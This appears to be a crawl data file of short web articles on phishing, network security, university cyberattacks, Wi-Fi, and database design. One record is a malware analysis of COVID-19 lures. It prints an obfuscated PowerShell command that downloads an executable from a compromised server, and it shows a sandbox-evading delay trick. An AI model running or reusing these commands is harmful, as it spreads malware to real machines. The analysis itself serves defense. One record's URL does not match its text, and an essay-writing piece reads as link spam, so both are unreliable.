CC-MAIN-2022-40
|
https://dualitytech.com/openfhe-and-the-google-transpiler-adventures-in-making-arbitrary-computation-with-fully-homomorphic-encryption-a-practical-reality/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00457.warc.gz
|
en
| 0.918869 | 3,125 | 2.59375 | 3 |
You’ve likely been advised to check for the padlock icon or HTTPS designation on a website as an indicator that it is secure and you can safely share your data. Well, that may be changing. According to the FBI, cybercriminals are more often incorporating website certificates—third-party verification that a site is secure—when they send phishing emails. There are steps you can take to reduce the likelihood of falling victim to HTTPS phishing, and they rely on your attention and common sense.
It’s Estimated That Half of All Phishing Sites Now Have the Padlock Icon
One report found that roughly half of all phishing scams are now hosted on websites whose addresses include both the padlock and HTTPS designation.
So what’s going on?
Theories vary, but some experts believe that scammers use the padlock more often because it’s become easier and cheaper for website creators to use an encrypted connection. Criminals may be able to get their own certificates to secure pages used in their phishing campaigns, and they can often do so without having to reveal much information about who they really are. Other bad actors may abuse pages hosted on cloud services, which sometimes allow them to automatically inherit the security certificate.
However it’s occurring, the criminal’s goal is typically the same: to lure victims to a malicious website that appears to be secure in order to acquire the victim’s login or other sensitive information.
Steps to Help Reduce the Risk of Falling Victim to HTTPS Phishing
Fortunately, there are steps to help reduce the likelihood of falling victim to an HTTPS scam. Perhaps the most important advice is this: consumers have to be more diligent than ever by checking for more than one sign that a website is legitimate.
- The FBI advises not to trust a website just because it has a padlock icon or HTTPS in the address bar.
- If you receive a suspicious email with a link, even from someone you know, first confirm that the message is legitimate by calling or emailing the person yourself. Never reply directly to suspicious emails.
- Check to make sure a website’s URL is correct. For example, look for misspellings or wrong domains, such as a .net domain that would normally be a .com domain. It’s a best practice to type the URL of the website you want to visit directly into the browser instead of following a link you received in an email.
- Consider installing tools like a password manager or security software. Those tools sometimes include features that can warn you when a URL doesn’t match the legitimate website or can prevent you from opening a scam site.
What to Do if You Suspect HTTPS Phishing
The FBI encourages victims to report suspicious activity to their local FBI field office, as well as file a complaint with the IC3 at www.ic3.gov. If the complaint relates to this particular scam, the FBI recommends noting “HTTPS phishing” in the message.
|
<urn:uuid:36369bbb-4929-4a73-b31a-3913c13e1046>
|
CC-MAIN-2022-40
|
https://www.idwatchdog.com/education/reduce-risk-https-phishing
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00457.warc.gz
|
en
| 0.937988 | 617 | 2.734375 | 3 |
Automation describes a process of minimizing the human input required to accomplish a task. This can be done digitally using applications, programing or scripts. Businesses use automation to deliver products and services faster. The manufacturing industry has been a long-time automation user, applying it to product fabrication and assembly. Software algorithms have expanded automation adoption to many digital tasks.
Artificial intelligence and machine learning make it easy to use automation in today’s digital-first environments. Many practical automation use cases involve data management — entering, cleansing or analyzing data. You can also automate decision-making based on defined conditions.
While automation offers many potential solutions to complex issues, it’s most effective for mundane and routine tasks. This helps increase efficiency and accuracy, so that employees can spend more time on strategic work.
|
<urn:uuid:07e708eb-b540-422f-afab-6358ae1aac54>
|
CC-MAIN-2022-40
|
https://www.insight.com/en_US/glossary/a/automation.html
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00457.warc.gz
|
en
| 0.885849 | 163 | 2.921875 | 3 |
It is worthwhile to sum up in a single place all the major issues in designing Oracle database applications—thus “The Commandments” (or perhaps “The Suggestions”). Their presentation does not assume that you need to be told what to do, but rather that you are capable of making rational judgments and can benefit from the experience of others facing the same challenges. The purpose here is not to describe the development cycle, which you probably understand better than you want to, but rather to bias that development with an orientation that will radically change how the application will look, feel, and be used. Careful attention to these ideas can dramatically improve the productivity and happiness of an application’s users.
The ten commandments of humane database application design:
- Include users. Put them on the project team and teach them the relational model and SQL.
- Name tables, columns, keys, and data jointly with the users. Develop an application thesaurus to ensure name consistency.
- Use English words that are meaningful, memorable, descriptive, short, and singular. Use underscores consistently or not at all.
- Don’t mix levels in naming.
- Avoid codes and abbreviations.
- Use meaningful keys where possible.
- Decompose overloaded keys.
- Analyze and design from the tasks, not just the data. Remember that normalization is not design.
- Move tasks from users to the machine. It is profitable to spend cycles and storage to gain ease of use.
- Don’t be seduced by development speed. Take time and care in analyses, design, testing, and tuning.
If you have a poor design, your application will suffer no matter what commands you use. Plan for functionality, plan for performance, plan for recoverability, plan for security, and plan for availability. Plan for success.
|
<urn:uuid:e0f0ebde-6474-4156-a4f0-7d9b7b72e5d2>
|
CC-MAIN-2022-40
|
https://logicalread.com/commandments-oracle-app-design-mc06/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00457.warc.gz
|
en
| 0.929254 | 381 | 2.515625 | 3 |
What is Network Security?
Network Security protects your network and data from breaches, intrusions and other threats. This is a vast and overarching term that describes hardware and software solutions as well as processes or rules and configurations relating to network use, accessibility, and overall threat protection.
Network Security involves access control, virus and antivirus software, application security, network analytics, types of network-related security (endpoint, web, wireless), firewalls, VPN encryption and more.
Benefits of Network Security
Network Security is vital in protecting client data and information, keeping shared data secure and ensuring reliable access and network performance as well as protection from cyber threats. A well designed network security solution reduces overhead expenses and safeguards organizations from costly losses that occur from a data breach or other security incident. Ensuring legitimate access to systems, applications and data enables business operations and delivery of services and products to customers.
Types of Network Security Protections
Firewalls control incoming and outgoing traffic on networks, with predetermined security rules. Firewalls keep out unfriendly traffic and is a necessary part of daily computing. Network Security relies heavily on Firewalls, and especially Next Generation Firewalls, which focus on blocking malware and application-layer attacks.
Network segmentation defines boundaries between network segments where assets within the group have a common function, risk or role within an organization. For instance, the perimeter gateway segments a company network from the Internet. Potential threats outside the network are prevented, ensuring that an organization’s sensitive data remains inside. Organizations can go further by defining additional internal boundaries within their network, which can provide improved security and access control.
What is Access Control?
Access control defines the people or groups and the devices that have access to network applications and systems thereby denying unsanctioned access, and maybe threats. Integrations with Identity and Access Management (IAM) products can strongly identify the user and Role-based Access Control (RBAC) policies ensure the person and device are authorized access to the asset.
Remote Access VPN
Remote access VPN provides remote and secure access to a company network to individual hosts or clients, such as telecommuters, mobile users, and extranet consumers. Each host typically has VPN client software loaded or uses a web-based client. Privacy and integrity of sensitive information is ensured through multi-factor authentication, endpoint compliance scanning, and encryption of all transmitted data.
Zero Trust Network Access (ZTNA)
The zero trust security model states that a user should only have the access and permissions that they require to fulfill their role. This is a very different approach from that provided by traditional security solutions, like VPNs, that grant a user full access to the target network. Zero trust network access (ZTNA) also known as software-defined perimeter (SDP) solutions permits granular access to an organization’s applications from users who require that access to perform their duties.
Email security refers to any processes, products, and services designed to protect your email accounts and email content safe from external threats. Most email service providers have built-in email security features designed to keep you secure, but these may not be enough to stop cybercriminals from accessing your information.
Data Loss Prevention (DLP)
Data loss prevention (DLP) is a cybersecurity methodology that combines technology and best practices to prevent the exposure of sensitive information outside of an organization, especially regulated data such as personally identifiable information (PII) and compliance related data: HIPAA, SOX, PCI DSS, etc.
Intrusion Prevention Systems (IPS)
IPS technologies can detect or prevent network security attacks such as brute force attacks, Denial of Service (DoS) attacks and exploits of known vulnerabilities. A vulnerability is a weakness for instance in a software system and an exploit is an attack that leverages that vulnerability to gain control of that system. When an exploit is announced, there is often a window of opportunity for attackers to exploit that vulnerability before the security patch is applied. An Intrusion Prevention System can be used in these cases to quickly block these attacks.
Sandboxing is a cybersecurity practice where you run code or open files in a safe, isolated environment on a host machine that mimics end-user operating environments. Sandboxing observes the files or code as they are opened and looks for malicious behavior to prevent threats from getting on the network. For example malware in files such as PDF, Microsoft Word, Excel and PowerPoint can be safely detected and blocked before the files reach an unsuspecting end user.
Hyperscale Network Security
Hyperscale is the ability of an architecture to scale appropriately, as increased demand is added to the system. This solution includes rapid deployment and scaling up or down to meet changes in network security demands. By tightly integrating networking and compute resources in a software-defined system, it is possible to fully utilize all hardware resources available in a clustering solution.
Cloud Network Security
Applications and workloads are no longer exclusively hosted on-premises in a local data center. Protecting the modern data center requires greater flexibility and innovation to keep pace with the migration of application workloads to the cloud. Software-defined Networking (SDN) and Software-defined Wide Area Network (SD-WAN) solutions enable network security solutions in private, public, hybrid and cloud-hosted Firewall-as-a-Service (FWaaS) deployments.
Robust Network Security Will Protect Against
- Virus: A virus is a malicious, downloadable file that can lay dormant that replicates itself by changing other computer programs with its own code. Once it spreads those files are infected and can spread from one computer to another, and/or corrupt or destroy network data.
- Worms: Can slow down computer networks by eating up bandwidth as well as the slow the efficiency of your computer to process data. A worm is a standalone malware that can propagate and work independently of other files, where a virus needs a host program to spread.
- Trojan: A trojan is a backdoor program that creates an entryway for malicious users to access the computer system by using what looks like a real program, but quickly turns out to be harmful. A trojan virus can delete files, activate other malware hidden on your computer network, such as a virus and steal valuable data.
- Spyware: Much like its name, spyware is a computer virus that gathers information about a person or organization without their express knowledge and may send the information gathered to a third party without the consumer’s consent.
- Adware: Can redirect your search requests to advertising websites and collect marketing data about you in the process so that customized advertisements will be displayed based on your search and buying history.
- Ransomware: This is a type of trojan cyberware that is designed to gain money from the person or organization’s computer on which it is installed by encrypting data so that it is unusable, blocking access to the user’s system.
|
<urn:uuid:5fb80abc-5f54-4bb5-8f30-7e81f5ccb757>
|
CC-MAIN-2022-40
|
https://cybercoastal.com/cybersecurity-tutorial-for-beginners-network-security/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00457.warc.gz
|
en
| 0.923951 | 1,439 | 2.984375 | 3 |
Are you having difficulty putting together a written composition? Do you end up struggling to correctly construct and arrange an essay that you feel will have the merit to win you a prize or grade? If so, do not give up hope just yet! The fact of the matter is that, although there are plenty of resources on and offline that provide written essay examples and guidance, lots of your success boils down to your ability to effectively learn and apply the data you are provided with. Therefore, this article I will highlight some crucial measures that you can take to improve your essay writing. Hopefully by the time you’ve finished reading this, you will get a better comprehension of how to develop a good composition and will have the ability to apply this advice and examples for your own writing style.
To be able to attain the correct arrangement for your written essay, it is important to first understand the different parts which compose a good essay. By breaking down every step of your essay into its own small segment, you will be better able to analyze your writing and ensure that it comes together in a cohesive manner. If you know how each piece fits into the larger whole and the way each section functions within the bigger picture, then you’re well on your way to creating a good essay.
One of the most important things to keep in mind when constructing an article is that your thesis needs to be the middle of attention. You want to use your thesis statement as a climax to your article, setting up the main point and the various supporting arguments that you will be taking to encourage it. If your thesis is weak, the remainder of the essay will sound weak too. Make sure that your thesis statement sells you (its main point) in three simple to understand paragraphs: an introduction, a main point, and a conclusion.
The introduction is the first portion of your essay, which lays out your entire argument. It ought to immediately grab the reader’s attention through a catchy headline along with a clear opening paragraph. Use a powerful opening line which leaves your reader with instant confidence. Your introduction needs to paint a clear picture of what you expect to attain through your own writing. This may also be the section in which you’ll be able to begin creating your outline.
The next area of the essay is your conclusion. Contrary to the introduction, your conclusion does not have to begin a new paragraph. Nonetheless, this is the area where you can genuinely close out the story of your essay by summarizing all of the primary points. Summarize the main points of your essay in bullet type, using subheadings to separate the main points from one another. You spell check want to create a clear and succinct statement of why your topic is important and your decision supports it.
The final part of your article is the body of your job. This consists of a brief paragraph that summarizes your thesis statement or outline of the arguments in your essay. It is possible to use footnotes during your work, but your main focus should be on using the appropriate contextual comma placement checker information to strengthen your arguments. Footnotes should be used to show the extent of your research on a specific subject and the textual sources utilized to support it. Your footnotes must also recognize the specific scholarly sources utilized by you.
|
<urn:uuid:f6b481a6-29d9-4b96-b155-b906e7705e70>
|
CC-MAIN-2022-40
|
https://www.403tech.com/how-to-write-a-good-essay/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00457.warc.gz
|
en
| 0.942714 | 662 | 2.625 | 3 |
It’s a question often asked: what is the difference between Cybersecurity as a Service and Incident Response?
The short answer is, Cyber as a Service focuses on the planning and preparation that happens before a security incident, and Cyber Incident Response is concerned with the actions taken immediately after a cyber-attack takes place (or is discovered).
Cybersecurity as a Service is an affordable yet comprehensive way for organizations to assess their cybersecurity program by having an unbiased third party identify its vulnerabilities and weak points. By knowing what areas are vulnerable, companies can address critical risks and create a plan to react to a data breach or other security incident.
Basic tactics of a Cybersecurity as a Service program include:
- Cybersecurity Assessment, where your current security plan is measured against industry best practices. These frameworks may vary based on company, industry, and regulatory requirements.
- Cyber-Attack Simulations are conducted with your Cyber Incident Response Team to find gaps in your response plan and improve your cyber-attack readiness, so you know what to do in the event of an actual security incident.
- Security Plan Development, which creates or updates your current plan based on your cybersecurity assessment. Your plan includes the steps, processes, and personnel resources required to react to a security breach.
Cyber Incident Response is the action taken immediately after a cybersecurity incident, data breach, or other cyber threat happens. Having an Incident Response Plan in place is essential, because a cyber-attack at your business can seriously damage your brand and reputation and expose your competitive advantages and intellectual property to the world.
At a minimum, Cyber Incident Response includes:
- Immediate Incident Response, the initial steps taken to contain and control a security incident. This includes assembling your Cyber Incident Response Team, identifying the cause of the breach, and containing the damage.
- Network and System Restoration inspects your email system, web servers, eCommerce servers, and cloud applications to verify they are free of viruses and malware and that users have access so business operations can continue.
- Damage Remediation confirms that all systems in your IT environment are operational and fixes any that were compromised to ensure they are secure.
- Data Recovery ensures that all data located on servers, business systems, applications, and endpoint devices is accessible and operational.
Cybersecurity as a Service and Cyber Incident Response are not mutually exclusive services; they both have their place in a solid, healthy cyber security program.
Fortress Security Risk Management is a global data protection company that helps organizations dramatically minimize their risk of disruption from unforeseen events like cyber-attacks. We offer both Cybersecurity as a Service and Cyber Incident Response services to help you achieve the highest degree of security and the least amount of risk, or what we call, SecurityCertaintySM.
If you’d like more information on our full spectrum cybersecurity services, contact us today!
|
<urn:uuid:90cdebfd-7c9e-485d-89e0-1582c725ff20>
|
CC-MAIN-2022-40
|
https://fortresssrm.com/whats-the-difference-between-cybersecurity-as-a-service-and-cyber-incident-response/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00457.warc.gz
|
en
| 0.943541 | 582 | 2.515625 | 3 |
It's hard to think back to what life was like without Wi-Fi. Everyday, Americans visit coffee shops, libraries, friends' homes, they sit in airport lounges and train stations and even in their own homes and businesses and Wi-Fi is the technology that keeps them all connected. Business goes on, personal connections stay strong, and news travels fast, as Wi-Fi keeps people up to date and empowers internet users wherever they are.
In the first quarter of last year, 89 percent of U.S. households with broadband used Wi-Fi to connect to the internet. In each household, consumers connect nearly 15 devices to the internet—1.4 billion connected devices in all, most of which rely on Wi-Fi. The latest traffic forecasts predict that Wi-Fi will carry 34 exabytes of data per month by 2021, more than triple the amount it carried in 2016. The stats say it all--people are choosing Wi-Fi to connect and go about their digital lifestyles, and use will only continue to grow exponentially from here.
|
<urn:uuid:f215c94e-975f-4e9f-b1bb-cea7dc908a4a>
|
CC-MAIN-2022-40
|
https://www.ncta.com/whats-new/wi-fi-how-broadband-households-experience-the-internet
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00457.warc.gz
|
en
| 0.950211 | 215 | 2.625 | 3 |
Cybercriminals continue to exploit the COVID-19 theme in their cyberattacks, trying to trick users into entering their credentials or personal information on a phishing web page or loading malicious documents that pretend to contain essential information related to the COVID-19 pandemic.
Here is a quick roundup of examples that show how scammers and hackers are leveraging the crisis.
Fake financial aid for COVID-19
The state of North Rhine-Westphalia (NRW) in Germany recently fell a victim of a phishing campaign. Attackers created rouge copies of the NRW Ministry of Economic Affairs’ website for requesting COVID-19 financial aid. The fraudsters collected the personal data submitted by victims and then submitted their own requests to the legitimate website using the victims’ information but the criminals’ bank account. NRW officials reported that up to 4,000 fake requests had been granted, resulting in up to $109 million being sent to the scammers.
Tricked by free COVID-19 testing
Another COVID-19 fraud case has been reported by Microsoft's Security Intelligence Team. The latest version of Trickbot/Qakbot/Qbot malware has been spread in numerous phishing emails offering free COVID-19 testing. Victims were asked to fill out an attached form, which turned out to be a fake document embedded with a malicious script. To avoid revealing its payload in malware sandboxes, the script wouldn’t start downloading its payload until after some time had passed.
The lure document uses a standard gimmick to trick users into clicking ‘Enable Content’ which allows the execution of the malicious VBA script that is embedded.
The VBA script is obfuscated to avoid being detected by antiviruses.
The attackers leverage a delay trick with Windows choice application that waits for /T <time in seconds> until selecting a default choice ‘Y’. In our case, the script waits for 65 seconds until the deletion of the temporary files:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
While waiting, it downloads a piece of malware using the following PowerShell script:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
After Base64 decoding, the PowerShell script downloads the backdoor from the hacked web server located in Germany:
and saves as:
The folder ‘C:\Users\Public\tmpdir’ has been preliminary created by executing ‘tmps1.bat’ with the following command:
cmd /c mkdir ""C:\Users\Public\tmpdir""
Phishing attacks against Office 365
Users of Microsoft 365 (formerly Office 365) have been attacked recently with a phishing email that supposedly delivers a missed voicemail message as an attachment. In fact, the attached HTML page led victims to a phishing website that mimics the Microsoft 365 login page.
Attacks target Wuhan government offices
Recently, FireEye wrote about the Vietnamese APT32 attack that targeted government offices in Wuhan and the Chinese Ministry of Emergency Management. One of the decoy RTF documents in a spear-phishing attack showed a New York Times article titled Coronavirus Live Updates: China is Tracking Travelers From Hubei and used it to load a malicious payload identified by FireEye researchers as METALJACK.
Currently, the document is not detected by any antivirus program on the Virustotal.
It’s worth noting that COVID-19 poses a threat not only to human health but also to sensitive personal and business information that can be easily stolen with the help of social engineering tricks. Being suspicious of emails and web links from those you don’t know can go a long way in keeping your data and funds protected from scammers.
|
<urn:uuid:1a37c0b5-26d3-49bf-87df-0630ed8f48c1>
|
CC-MAIN-2022-40
|
https://www.acronis.com/en-eu/blog/posts/covid-19-themed-cyberattacks-taking-hold/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00457.warc.gz
|
en
| 0.872521 | 1,027 | 2.609375 | 3 |
NIST researchers are studying how “intelligent” building systems can be used by firefighters, police and other first responders to accurately assess emergency conditions in real-time.
One of the biggest problems faced by first responders is a lack of accurate information. Where is the fire within the building? How big is it? Are there flammable chemicals stored nearby?
NIST is working with industry to develop standards to allow manufacturers to create intelligent building systems that use various types of communication networks (including wireless networks) to assist first responders in assessing and mitigating emergencies.
The systems would send information such as building floor plans and data from motion, heat, biochemical and other sensors and video cameras directly to fire and police dispatchers who then can communicate detailed information about the scene to first responders.
Read the full story at the NIST site
|
<urn:uuid:2a9c7764-bdc8-4cfa-9102-f6048e4d133b>
|
CC-MAIN-2022-40
|
https://www.cioinsight.com/case-studies/smart-buildings-to-guide-future-first-responders/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00457.warc.gz
|
en
| 0.95185 | 170 | 3.296875 | 3 |
Cyberattacks on Colleges and Universities
Cyberattacks on colleges and universities are commonly levied by criminals aiming to steal their research or student information. Cyber criminals will often use phishing, spear phishing, and hardware or software vulnerabilities to launch assaults on their networks and information.
Cyberattacks on universities are also common because attackers can use a university’s powerful computers to execute the attack if they are able to gain access to some of its resources.
Reasons Why Colleges and Universities Are Cyberattack Favorites
Cybersecurity in higher ed is particularly important because cyber criminals are often drawn by enticing financial opportunities. Some of these include:
- Ransomware attacks that enable them to demand a ransom
- Cyber extortion where they can blackmail users into paying money
- Stealing student information and selling it on the dark web
Financial gain is a primary driver for cyberattacks in the education sector.
Wealth of Personally Identifiable Information (PII)
Because student records are filled with sensitive PII, cyber criminals often target university databases. If they are able to penetrate the network, they can steal then use or sell the information to another criminal seeking to defraud people.
Valuable, Confidential Research
Universities spend millions each year in the discovery and investigation of cutting-edge concepts. Therefore, cyber criminals target them knowing a successful incursion could yield a treasure trove of information.
In an attempt to keep students, alumni, faculty, and staff connected, many colleges and universities try to maintain relatively open access. This can make them attractive targets for cyber criminals seeking to exploit weak defenses.
Remote operations and access privileges expand the attack surface significantly. Those who need to gain access to the network may do so using insecure public networks or home networks with lax protections.
Older systems may function well and support key elements of a university’s infrastructure, but they are also prone to security vulnerabilities. The longer a system has been around, the more time cyber criminals have had to find ways to crack it. This leaves many institutions vulnerable.
Large Untrained Network User Base
From students to faculty to support staff, the user base of a college or university’s network is huge. Many of them are unaware of the vast number of cybersecurity threats and attack vectors, leaving the institution exposed to breaches. Also, uninformed users are more likely to fall for attacks such as phishing, spear phishing, or spoofing—all of which hinge on a lack of understanding regarding legitimate vs. fake messages and sites.
Types of Cyberattacks That Colleges and Universities Are Most Likely To Face
A ransomware attack is one in which the attacker takes control of the user’s computer, locking them out until the hacker receives a payment. The value of the information and digital systems make universities a high-priority target for ransomware attacks.
Hacking is when someone gains unauthorized access to a computer or system, and hackers like to take advantage of the sometimes weak security protocols of higher education institutions. It is important for a university to guard against hackers to remain in compliance with the Family Educational Rights and Privacy Act (FERPA), which protects the privacy of students’ records.
A recent case study reveals how strategically positioning FortiGate next-generation firewalls (NGFWs) can protect an institution's network at the edge, in the data center, and in the cloud. Hillsborough Community College adopted a bring-your-own-device (BYOD) policy that greatly increased the size of its attack surface. They chose to use FortiGate NGFWs to protect multiple segments of their network, as well as keep students and staff in separate wireless domains. In this way, they were able to maintain a lean IT staff while preventing harmful hacking.
Taking steps like Hillsborough Community College has against hackers is necessary. This is especially true in light of an attack on the University of Michigan. Hackers were able to gain access to the university's social media platforms, resulting in an expensive, time-consuming breach.
Phishing involves sending communications, typically through email, that trick a victim into giving away sensitive information. The attack surface of a college or university includes all students, faculty, and staff that have email accounts, necessitating a need for vigilance around phishing.
In a spear-phishing attack, the attacker seeks to target specific victims to steal information or install malware on their systems. Higher education cybersecurity therefore needs to involve educating users who may be particularly vulnerable to spear phishing. These would include professors, department heads, and anyone with access to student records.
Spoofing involves a person or a program appearing to be legitimate when it is really trying to steal data or infiltrate a system. A university or college is susceptible to spoofing attacks by virtue of its large and often uninformed user community.
Impact of Cyberattacks on Colleges and Universities
The risk posed by cyberattacks falls into three categories.
Institutions can experience significant financial loss due to ransomware attacks, students choosing to enroll in other schools that have better cybersecurity, and fewer donations from alumni.
A college or university that has a successful attack publicized in the media may look vulnerable and weak. This hurts its standing with alumni, board members, the general public, and most significantly, current and potential students.
A cybersecurity breach can impact remote learning for students, the financial transactions performed by bursars, vendors, and students, the grade management system, and other key elements of the institution’s infrastructure.
How Can Colleges and Universities Defend Against Cyberattacks?
Regular Monitoring and Early Detection
By regularly checking the health of a system, as well as incorporating an early detection solution, you can spot attacks early in their life cycle. This can prevent extensive damage or thwart the attack altogether.
Establish a Formal Security Policy
A formal security policy helps get all stakeholders on board and attaches specific action steps to security objectives. Also, a formal security policy helps encourage more enthusiastic buy-in from stakeholders.
Education and Training
When students and faculty are trained to recognize, avoid, and mitigate the effects of attacks, the entire institution is safer, as is its reputation and income stream.
Recent Cyberattacks on Colleges and Universities
In 2020 alone, there were over a dozen high-profile cyberattacks on colleges and universities. These include breaches at:
- Richmond Community Schools in Michigan
- Gadsden Independent School District in Las Cruces, New Mexico
- Michigan State University (twice)
- Columbia College in Chicago
- University of California, San Francisco (twice)
- The entire California State University system
- Lenoir-Rhyne University, a private school in Hickory, North Carolina
- University of Notre Dame
- University of South Dakota
- University of Central Arkansas
- Wake Technical Community College in Raleigh, North Carolina
How Fortinet Can Help Avoid Cyberattacks on Colleges and Universities
Fortinet has years of experience protecting colleges and universities from cyberattacks. With FortiOS 7.0, a college or university gets a security-focused operating system that bolsters both your cyber protections and the functioning of your network. Students and faculty can safely access your institution’s services from all over the globe, thanks to FortiSASE. This provides cloud-based Security-as-a-Service (SECaaS) to protect the diverse and broad networks of universities and colleges.
|
<urn:uuid:46b533bb-4889-455c-ae25-ef0ad01de258>
|
CC-MAIN-2022-40
|
https://www.fortinet.com/ru/solutions/industries/higher-ed/cyberattacks-on-colleges
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00457.warc.gz
|
en
| 0.934699 | 1,556 | 2.75 | 3 |
Developing IoT Applications with Rust: Using a Rust Development Environment
Developers are most productive when they have tools to support all aspects of the software development cycle.
This includes programming languages, library and package managers, and testing and deployment tools. The Rust programming language has matured to the point that its ecosystem now includes an array of key support tools. One of these tools is Cargo.
Cargo is a package manager that supports all the core tasks of package management in both binary and library form. Cargo handles a lot of tasks, such as building your code, downloading the libraries your code depends on, and building those libraries, or dependencies.
Once Rust is installed, you canuse Cargo’s from the command line. Cargo commands are intuitive to the point of being obvious. For example, the cargonew’ command instructs Cargo to create a new package, which includes a directory structure for the package and a specification for the package, which is called a manifest. The manifest will contain metadata used by the Rust compiler.
Application code often has dependencies on other libraries and artifacts. When a Rust application has dependencies, Cargo can get those dependencies during the build process. Not surprisingly, to build a package, we use the ‘rustc’ command, to call the Rust compiler.
Cargo observes conventions regarding package directory structure. Subdirectories include src (for source code), benches (for benchmark code) and tests (for integration test). The default executable file is src/main.rs. However, you can find other binaries in /src/bin/.
Cargo’s configuration metadata is defined in Cargo.toml and will be created and maintained manually. Another metadata file, Cargo.lock, contains metadata about dependencies. Unlike Cargo.toml, Cargo.lock is
maintained by Cargo and won’t be edited by developers. Configuration data is specified in TOML format, which is designed to have obvious semantics.
Cargo.toml contains sections describing the package, dependencies and features. The package section includes name, version, authors, path to build script, and license information. The dependencies section holds package dependencies, test dependencies, and build dependencies. Lastly, the features section specifies conditional compilation conditions, which is useful when working with multiple environments that need different configurations.
Developers can specify integration tests and run those tests using the ‘cargo test’ command. It’s common practice to use both unit tests and integration tests. Unit tests are designed to test one component or application function at a time, while integration tests will test the application in ways similar to how the application will be used in production. By convention, Rust expects to find tests in the tests subdirectory of a package. Each file in the tests subdirectory is compiled as a separate crate.
Often, developers will re-use common functions across tests and this is easily done with Rust. Developers can create public functions in modules and then import them into tests.
When looking at the organization of a Rust application, there are multiple levels of structure. The lowest level is the function, common across programming languages. Modules are different related functions grouped into a single file. Crates, the next level up, contain modules and, as noted earlier, are the unit of compilation. The last organizational unit is workspaces. These are used to organize multiple crates in the same application.
Rust extends the advantages of this modular application structure beyond just what one developer creates. The Crates.io site contains tens of thousands of crates that are available for use. There are widely used crates for common functional requirements, like generating random numbers, logging, and parsing command line arguments. In addition, there are many specialized crates, including ones for IoT application development. There will be more specifics on those IoT crates in the next article of this series.
|
<urn:uuid:957c2154-ce06-4c13-b73f-c0d251d1eb9e>
|
CC-MAIN-2022-40
|
https://www.iotworldtoday.com/2021/02/24/developing-iot-applications-with-rust-using-a-rust-development-environment/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00657.warc.gz
|
en
| 0.907966 | 783 | 2.625 | 3 |
In the United States, basically every part of our financial life revolves around something called a credit score. We all know what a credit score is, but not many of us know how those work. Prospective borrowers tell lenders a lot about themselves with just three-digits, those being your credit score. Lenders will know if you normally pay your bills and loans on time or if you are in the habit of paying late. They will also know what types of recorded debt you have including car loans, mortgages, and even what percentage of your credit card borrowing capacity is available to you each month.
The FICO credit scoring system hasn’t always been around, though. In 1841, the Mercantile Agency collected information from its members around the country to standardize the character and assets of the borrower. In the end, it was found that these statistics that were being collected were too subjective as many views had racial, class, and gender biases.
Just over 100 years later, in 1956, the Fair, Isaac and Company – now known as FICO – was founded. They didn’t get their big break until 1989 when their algorithm became the industry standard for determining credit riskiness.
When you apply for loans or new credit cards, lenders will rely on your credit history report to determine how risky of a borrower you are. You may not qualify for a car loan or mortgage if your credit score is too low, but if you do qualify with a low credit score, your interest rate will be much higher than those with excellent credit scores. This increased interest rate means a higher cost of borrowing the money. The reason for the lender increasing the interest rate is because you would be considered a higher risk borrower.
What are some factors that impact your credit score?
- Payment history – do you have a history of paying on-time consistently?
- Percentage of credit usage – the more you use, the more your credit score will suffer.
- Age of credit history – how long have you been a trustworthy buyer?
- Mix of credit – how many forms of credit have you taken out? If you have more types, it’s positive towards your credit score.
- Hard inquiries – if a lender looks at your credit score, it can negatively impact your credit score temporarily.
LibertyID provides expert, full service, fully managed identity theft restoration to individuals, couples, extended families* and businesses. LibertyID has a 100% success rate in resolving all forms of identity fraud on behalf of our subscribers.
*Extended families – primary individual, their spouse/partner, both sets of parents (including those that have been deceased for up to a year), and all children under the age of 25
|
<urn:uuid:ce56a495-d1db-4e5d-8617-b00a0c69bda1>
|
CC-MAIN-2022-40
|
https://www.libertyid.com/blog/how-do-credit-scores-work-anyway/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00657.warc.gz
|
en
| 0.972335 | 555 | 2.609375 | 3 |
The importance of the lithium-ion battery for future data centres
Data Centers are becoming more essential as demand for data skyrockets in the COVID-19 era, whether it be enterprises and governments relying more heavily on cloud services, or consumers using more bandwidth as they rely on the internet during lockdowns.
But data centers have, for years, faced criticism for vast perceived inefficiencies: many expend a gargantuan amount of energy, in many cases unsustainably; data centers also traditionally have large physical footprints due to the size of its many machines.
But there may be a solution these two problems – the lithium-ion (Li-ion) battery.
